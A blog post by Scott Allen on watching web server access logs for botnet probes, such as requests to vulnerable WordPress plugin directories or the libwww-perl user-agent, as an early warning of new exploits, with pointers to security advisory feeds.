Examining Logs and Sharing Knowledge Can Help Expose Security Flaws

by Scott Allen

Every time a new security exploit is announced, hackers program their botnets to pound sites looking for these obscure holes. By keeping a pulse on our site access logs, I can immediately tell what new security flaws are in existence because of the types of url’s that the bots hit. Normally you would want to be reading security alerts to stay on top of current security exploits, but often hackers know before the exploits get discovered by the security industry, and monitoring your logs can help you discover exploits early.

For example, lately I see a lot of bots have been trying to access files in the /wp-content/plugins/wordtube/ and /wp-content/plugins/pictpress/ directories and inject code from a third party site. (The directories don’t exist because neither Wordtube or Pictpress are installed on any of our blogs.) These access attempts tell you instantly that there is a security exploit with some version of Wordtube and Pictpress, or botnets wouldn’t be trying to inject code into these files. (And from doing a quick search I found Secunia Alerts for both Wordtube and Pictpress, as well as blog posts by others who were affected.) Those are merely a couple of examples, and these change every few days or weeks.

When you have access to enough websites to start seeing some trends (like we do), you start to understand botnet behavior and see how they are like herds. They will feed on one exploit for weeks. (We see them looking for the same types of files.) Then at some point they stampede off to another exploit and feed on that on for a few days or weeks.) We usually only see them going after 2-3 different exploits at a time. This happens because the hackers stay on top of security alerts (whether publicly announced on security sites or in private hacker forums) and the instant a new one is released, they program their bots to go after it.

The easiest way to find security flaws like this is to scan your logs for accesses with the user-agent libwww-perl. Statistically, most hackers are low-end, and are too lazy to change the user-agents, so it’s easy to spot (at least for now). See what files they are trying to access, and if any of them are recognizable. For an example of what these typically look like, read this post. (The technique discussed will help block many file/code injection exploits, and give the developers time to patch the plugins or applications.)

(Because we are a web design and internet marketing firm, we have to automate this process. We’ve got a pretty slick system in place so we’re automatically alerted without having to scan our logs manually. We know instantly when botnets are looking for exploits. If you don’t have to manage more than a few web sites, it’s a lot easier to look through your log files manually. There are some open-source scripts that will do it for you as well.)

If you have the plugin or script with the security exploit, it’s probably already been compromised, but if not, you can help out others by spreading the knowledge. Who knows, you could be the first one to find an exploit that isn’t publicly known about. I want to encourage site owners to raise the level of website security awareness. We can help out others in the internet community and reduce hacking incidents by blogging about our findings. Sort of like a blogosphere neighborhood watch. It’s something small that any site owner can do, regardless of skill or experience level, and it will make a difference.

More Info on Website Security:

Find out about security exploits before you get hacked.
Subscribe to the Secunia Advisories RSS Feed to be alerted to the latest advisories.
Read BlogSec to stay abreast of WordPress security issues.
Sign up for Government US-CERT Alerts.
If there is an attack on your site (hacking, DDoS, etc.), whether successful or not, report it to law enforcement here and here.